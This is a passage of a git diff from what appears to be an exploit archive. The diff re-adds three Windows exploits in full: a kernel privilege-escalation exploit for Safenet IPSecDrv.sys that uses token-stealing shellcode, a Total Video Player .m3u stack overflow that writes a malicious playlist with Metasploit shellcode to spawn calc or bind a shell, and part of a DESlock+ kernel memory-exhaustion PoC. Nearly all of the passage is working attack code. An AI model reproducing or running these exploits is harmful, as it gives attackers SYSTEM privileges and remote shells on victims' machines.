GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - switch (dwMinorVersion) - { - case 1: - *zlen = sizeof winxp_ring0_shell - 1; - *(PDWORD) &winxp_ring0_shell[55] = ppid; - return (winxp_ring0_shell); - - case 2: - *zlen = sizeof win2k3_ring0_shell - 1; - *(PDWORD) &win2k3_ring0_shell[58] = ppid; - return (win2k3_ring0_shell); - - default: - fprintf (stderr, "* GetVersion, unsupported version\n"); - exit (EXIT_FAILURE); - } - - return (NULL); -} - -static PVOID -get_module_base (void) -{ - PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase; - PSYSTEM_MODULE_INFORMATION pModuleInfo; - DWORD i, num_modules, status, rlen; - PVOID result; - - status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen); - if (status != 
STATUS_INFO_LENGTH_MISMATCH) - { - fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); - exit (EXIT_FAILURE); - } - - pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen); - - status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen); - if (status != STATUS_SUCCESS) - { - fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); - exit (EXIT_FAILURE); - } - - num_modules = pModuleInfo->Count; - pModuleBase = &pModuleInfo->Module[0]; - result = NULL; - - for (i = 0; i < num_modules; i++, pModuleBase++) - if (strstr (pModuleBase->ImageName, "IPSECDRV.sys")) - { - result = pModuleBase->Base; - break; - } - - HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo); - - return (result); -} - -int -main (int argc, char **argv) -{ - struct ioctl_req req; - LPVOID c_addr, p_addr; - LPVOID zpage, zbuf, base, pbase; - DWORD rlen, zlen, ppid; - HANDLE hFile; - BOOL result; - - printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM exploit\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); - - if (argc <= 1) - { - fprintf (stderr, "Usage: %s \n", argv[0]); - exit (EXIT_SUCCESS); - } - - ppid = atoi (argv[1]); - - hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE, - FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, - OPEN_EXISTING, 0, NULL); - if (hFile == INVALID_HANDLE_VALUE) - { - fprintf (stderr, "* CreateFileA failed, %d\n", hFile); - exit (EXIT_FAILURE); - } - - zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); - if (zpage == NULL) - { - fprintf (stderr, "* VirtualAlloc failed\n"); - exit (EXIT_FAILURE); - } - printf ("* allocated page: 0x%08X [%d-bytes]\n", - zpage, 0x10000); - - c_addr = zpage; - base = get_module_base (); - p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 16); - printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr); - printf ("* call distance: 
0x%08X\n", p_addr); - - memset (zpage, 0xCC, 0x10000); - zbuf = fixup_ring0_shell (base, ppid, &zlen); - memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1); - memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen); - memcpy (zpage + sizeof (win32_fixup) + zlen - 1, - win32_ret, sizeof (win32_ret) - 1); - - memset (&req, 0, sizeof req); - req.arg[0] = p_addr; - - /* jump to our address :) */ - printf ("* jumping.. "); - result = DeviceIoControl (hFile, IPSECDRV_IOCTL, - &req, sizeof req, &req, sizeof req, &rlen, 0); - if (!result) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - printf ("done\n\n" - "* hmmm, you didn't STOP the box?!?!\n"); - - CloseHandle (hFile); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2008-01-29] +/* safenet-ipsec-call.c + * + * Copyright (c) 2008 by + * + * Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 indirect call SYSTEM exploit + * by mu-b - Thu 03 Jan 2008 + * + * - Tested on: IPSecDrv.sys 10.4.0.12 + * bundle with: SafeNET HighAssurance Remote, SoftRemote + * - Microsoft Windows 2003 SP2 + * + * user definable offset used in an indirect call. + * + * .text:10009970 000 mov eax, [esp+arg_0] + * .text:10009974 000 mov ecx, [esp+arg_4] + * .text:10009978 000 shl eax, 4 + * .text:1000997B 000 push ecx + * .text:1000997C 004 call off_1001C604[eax] + * + * Note: this can be made universal for all array offsets, + * relatively easily since we control the offset and therefore + * the memory address.. + * IPSecDrv.sys 10.4.0.12 - 0x1C604 + * 10.3.5.6 - 0x1B604 + * + * Compile: MinGW + -lntdll + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! 
+ */ + +#include +#include + +#include +#include + +#define IPSECDRV_IOCTL 0x80002064 + +#define ARG_SIZE(a) ((a)/sizeof (void *)) + +static unsigned char win32_fixup[] = + "\x53" + "\x52"; + +static unsigned char win2k3_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\xb0\x18\x02\x00\x00" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x94\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x9c\x00\x00\x00" + "\x2d\x98\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! */ + "\x8b\x89\xd8\x00\x00\x00" + "\x89\x88\xd8\x00\x00\x00" + "\x90"; + +static unsigned char winxp_ring0_shell[] = + /* _ring0 */ + "\xb8\x24\xf1\xdf\xff" + "\x8b\x00" + "\x8b\x70\x44" + "\x89\xf0" + /* _sys_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x04\x00\x00\x00" + "\x74\x11" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + "\xeb\x21" + /* _sys_eprocess_found */ + "\x89\xc1" + "\x89\xf0" + + /* _cmd_eprocess_loop */ + "\x8b\x98\x84\x00\x00\x00" + "\x81\xfb\x00\x00\x00\x00" + "\x74\x10" + "\x8b\x80\x8c\x00\x00\x00" + "\x2d\x88\x00\x00\x00" + "\x39\xf0" + "\x75\xe3" + /* _not_found */ + "\xcc" + /* _cmd_eprocess_found + * _ring0_end */ + + /* copy tokens!$%! 
*/ + "\x8b\x89\xc8\x00\x00\x00" + "\x89\x88\xc8\x00\x00\x00" + "\x90"; + +static unsigned char win32_ret[] = + "\x5a" + "\x5b" + "\xc2\x04\x00"; + +struct ioctl_req { + void *arg[ARG_SIZE(0x4C)]; +}; + +static PCHAR +fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen) +{ + DWORD dwVersion, dwMajorVersion, dwMinorVersion; + + dwVersion = GetVersion (); + dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); + dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); + + if (dwMajorVersion != 5) + { + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + switch (dwMinorVersion) + { + case 1: + *zlen = sizeof winxp_ring0_shell - 1; + *(PDWORD) &winxp_ring0_shell[55] = ppid; + return (winxp_ring0_shell); + + case 2: + *zlen = sizeof win2k3_ring0_shell - 1; + *(PDWORD) &win2k3_ring0_shell[58] = ppid; + return (win2k3_ring0_shell); + + default: + fprintf (stderr, "* GetVersion, unsupported version\n"); + exit (EXIT_FAILURE); + } + + return (NULL); +} + +static PVOID +get_module_base (void) +{ + PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase; + PSYSTEM_MODULE_INFORMATION pModuleInfo; + DWORD i, num_modules, status, rlen; + PVOID result; + + status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen); + if (status != STATUS_INFO_LENGTH_MISMATCH) + { + fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); + exit (EXIT_FAILURE); + } + + pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen); + + status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen); + if (status != STATUS_SUCCESS) + { + fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08X\n", status); + exit (EXIT_FAILURE); + } + + num_modules = pModuleInfo->Count; + pModuleBase = &pModuleInfo->Module[0]; + result = NULL; + + for (i = 0; i < num_modules; i++, pModuleBase++) + if (strstr (pModuleBase->ImageName, "IPSECDRV.sys")) + { + result = pModuleBase->Base; + break; + } + + 
HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo); + + return (result); +} + +int +main (int argc, char **argv) +{ + struct ioctl_req req; + LPVOID c_addr, p_addr; + LPVOID zpage, zbuf, base, pbase; + DWORD rlen, zlen, ppid; + HANDLE hFile; + BOOL result; + + printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM exploit\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + ppid = atoi (argv[1]); + + hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE, + FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, + OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + { + fprintf (stderr, "* CreateFileA failed, %d\n", hFile); + exit (EXIT_FAILURE); + } + + zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (zpage == NULL) + { + fprintf (stderr, "* VirtualAlloc failed\n"); + exit (EXIT_FAILURE); + } + printf ("* allocated page: 0x%08X [%d-bytes]\n", + zpage, 0x10000); + + c_addr = zpage; + base = get_module_base (); + p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 16); + printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr); + printf ("* call distance: 0x%08X\n", p_addr); + + memset (zpage, 0xCC, 0x10000); + zbuf = fixup_ring0_shell (base, ppid, &zlen); + memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1); + memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen); + memcpy (zpage + sizeof (win32_fixup) + zlen - 1, + win32_ret, sizeof (win32_ret) - 1); + + memset (&req, 0, sizeof req); + req.arg[0] = p_addr; + + /* jump to our address :) */ + printf ("* jumping.. 
"); + result = DeviceIoControl (hFile, IPSECDRV_IOCTL, + &req, sizeof req, &req, sizeof req, &rlen, 0); + if (!result) + { + fprintf (stderr, "* DeviceIoControl failed\n"); + exit (EXIT_FAILURE); + } + printf ("done\n\n" + "* hmmm, you didn't STOP the box?!?!\n"); + + CloseHandle (hFile); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2008-01-29] diff --git a/platforms/windows/local/5077.cpp b/platforms/windows/local/5077.cpp index 25e22654c..779cb48f7 100755 --- a/platforms/windows/local/5077.cpp +++ b/platforms/windows/local/5077.cpp 
@@ -1,134 +1,134 @@ -/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow -This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2. -I got the ideea to look in a prior version of TVP and -surprinse vuln to ,just as V1.30. -When parsing a crafted .m3u file stack gets corrupted,due a -long string,and causes a stack overflow.We get control of the EBP and -EIP registers.The ESP register points exactly after the retaddress position. -[corrupted stack] [EIP->points here][ESP->points here] -So do a jmp back and a JMP ESP and it points to a specific part of -the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w. -Vendor not informed yet. -Special THANKS to Expanders !!!! -*/ -#include -#include -#include -#include - -#define FIRST "#EXTM3U\r\n#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho\r\nD:\\" -#define LAST ".mp3\r\n" -#define OFFSET 545 - -#define EVILFILE "evil.m3u" - -//shellcode from metasploit -char scz1[]= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63" -"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32" -"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38" -"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e" -"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62" -"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74" -"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c" -"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39" -"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b" -"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64" -"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37" -"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b" -"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b" 
-"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47" -"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f" -"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61" -"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f" -"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55" -"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42" -"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57" -"\x70\x63"; -char scz2[]="\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" -"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" -"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" -"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" -"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" -"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" -"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" -"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" -"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" -"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" -"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" -"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" -"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" -"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" -"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" -"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" -"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" -"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" -"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" -"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" -"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" -"\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; - -char jmpback[] = 
"\xE9\xDE\xFD\xFF\xFF"; -void Notes(); - - int main() - { - FILE *p; - unsigned char *buffer; - unsigned int offset=0; - unsigned int retaddress=0x015EE557; - int input=0; - Notes(); - if((p=fopen(EVILFILE,"wb"))==NULL) -{ printf("error\n"); exit(0); - } - scanf("%d",&input); - switch(input) - { case 1: - buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12); - - memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12); - offset=OFFSET; - - memcpy(buffer+offset,&retaddress,4); - offset=OFFSET+4; - offset+=12; - memcpy(buffer+offset,scz1,strlen(scz1)); - offset+=strlen(scz1); - memset(buffer+offset,0x00,1); - fprintf(p,"%s%s%s",FIRST,buffer,LAST); - fclose(p); - break; - case 2: - buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12); - - memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12); - offset=OFFSET; - - memcpy(buffer+offset,&retaddress,4); - offset=OFFSET+4; - offset+=12; - memcpy(buffer+offset,scz2,strlen(scz2)); - offset+=strlen(scz2); - memset(buffer+offset,0x00,1); - fprintf(p,"%s%s%s",FIRST,buffer,LAST); - fclose(p); - break; - } - - free(buffer); - return 0; - } - -void Notes() -{ printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n"); - printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow\n"); - printf("Credits for finding this bug&&sploit go to fl0 fl0w\n"); - printf("SPECIAL THANKS TO EXPANDERS\n\n"); - printf("{1}Spawn Calc.exe\n"); - printf("{2}Bind port&&spanw a shell\n\n"); - printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n"); -} - -// milw0rm.com [2008-02-07] +/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow +This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2. +I got the ideea to look in a prior version of TVP and +surprinse vuln to ,just as V1.30. 
+When parsing a crafted .m3u file stack gets corrupted,due a +long string,and causes a stack overflow.We get control of the EBP and +EIP registers.The ESP register points exactly after the retaddress position. +[corrupted stack] [EIP->points here][ESP->points here] +So do a jmp back and a JMP ESP and it points to a specific part of +the stack that I want.Credits to finding this bug && sploit go to fl0 fl0w. +Vendor not informed yet. +Special THANKS to Expanders !!!! +*/ +#include +#include +#include +#include + +#define FIRST "#EXTM3U\r\n#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho\r\nD:\\" +#define LAST ".mp3\r\n" +#define OFFSET 545 + +#define EVILFILE "evil.m3u" + +//shellcode from metasploit +char scz1[]= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63" +"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32" +"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38" +"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e" +"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62" +"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74" +"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c" +"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39" +"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b" +"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64" +"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37" +"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b" +"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b" +"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47" +"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f" +"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61" +"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f" 
+"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55" +"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42" +"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57" +"\x70\x63"; +char scz2[]="\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" +"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f" +"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b" +"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09" +"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8" +"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b" +"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b" +"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0" +"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40" +"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92" +"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3" +"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71" +"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8" +"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9" +"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7" +"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0" +"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd" +"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f" +"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1" +"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40" +"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3" +"\x03\x75\x2c\x6f\x80\x8a\xfa\x90"; + +char jmpback[] = "\xE9\xDE\xFD\xFF\xFF"; +void Notes(); + + int main() + { + FILE *p; + unsigned char *buffer; + unsigned int offset=0; + unsigned int retaddress=0x015EE557; + int input=0; + Notes(); + if((p=fopen(EVILFILE,"wb"))==NULL) +{ printf("error\n"); exit(0); + } + scanf("%d",&input); + 
switch(input) + { case 1: + buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12); + + memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12); + offset=OFFSET; + + memcpy(buffer+offset,&retaddress,4); + offset=OFFSET+4; + offset+=12; + memcpy(buffer+offset,scz1,strlen(scz1)); + offset+=strlen(scz1); + memset(buffer+offset,0x00,1); + fprintf(p,"%s%s%s",FIRST,buffer,LAST); + fclose(p); + break; + case 2: + buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12); + + memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12); + offset=OFFSET; + + memcpy(buffer+offset,&retaddress,4); + offset=OFFSET+4; + offset+=12; + memcpy(buffer+offset,scz2,strlen(scz2)); + offset+=strlen(scz2); + memset(buffer+offset,0x00,1); + fprintf(p,"%s%s%s",FIRST,buffer,LAST); + fclose(p); + break; + } + + free(buffer); + return 0; + } + +void Notes() +{ printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n"); + printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow\n"); + printf("Credits for finding this bug&&sploit go to fl0 fl0w\n"); + printf("SPECIAL THANKS TO EXPANDERS\n\n"); + printf("{1}Spawn Calc.exe\n"); + printf("{2}Bind port&&spanw a shell\n\n"); + printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n"); +} + +// milw0rm.com [2008-02-07] diff --git a/platforms/windows/local/5141.c b/platforms/windows/local/5141.c index c6e62a70e..d9273056e 100755 --- a/platforms/windows/local/5141.c +++ b/platforms/windows/local/5141.c 
@@ -1,94 +1,94 @@ -/* deslock-list-leak.c - * - * Copyright (c) 2008 by - * - * DESlock+ <= 3.2.6 local kernel mem leak POC - * by mu-b - Fri 21 Dec 2007 - * - * - Tested on: DLMFENC.sys 1.0.0.26 - * - * kernel pool memory leak by continually allocating link list - * structures and never freeing them. This is not without a sense - * of irony in that each element must correspond to a unique - * ProcessID (arg[0]). Thus, adding a single element incurs a - * linear cost due to search :(. (O((n^2+n)/2) overall cost.) - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! - */ - -#include -#include - -#include - -#define DLMFENC_IOCTL 0x0FA4204C -#define DLMFENC_FLAG 0xC001D00D - -#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *)) - -struct ioctl_req { - int flag; - int req_num; - void *arg[ARG_SIZE(0x20)]; -}; - -static void -xor_mask_req (struct ioctl_req *req) -{ - DWORD i, pid; - PCHAR ptr; - - pid = GetCurrentProcessId (); - for (i = 0, ptr = (PCHAR) req; i < 0x0C; i++, ptr++) - *ptr ^= pid; -} - -int -main (int argc, char **argv) -{ - struct ioctl_req req; - DWORD i, rlen; - HANDLE hFile; - BOOL result; - - printf ("DESlock+ <= 3.2.6 local kernel mem leak PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); - - hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE, - FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, - OPEN_EXISTING, 0, NULL); - if (hFile == INVALID_HANDLE_VALUE) - { - fprintf (stderr, "* CreateFileA failed, %d\n", hFile); - exit (EXIT_FAILURE); - } - - memset (&req, 0, sizeof req); - - for (i = 0; i <= UINT_MAX; i++) - { - req.flag = DLMFENC_FLAG; - req.req_num = 0x03; - req.arg[0] = (void *) i; - - xor_mask_req (&req); - result = DeviceIoControl (hFile, DLMFENC_IOCTL, - &req, sizeof req, &req, sizeof req, &rlen, 0); - if (!result) - { - fprintf (stderr, "* DeviceIoControl failed\n"); - exit (EXIT_FAILURE); - } - - if (!(i % 64)) - printf ("%d..", i); - } - - CloseHandle 
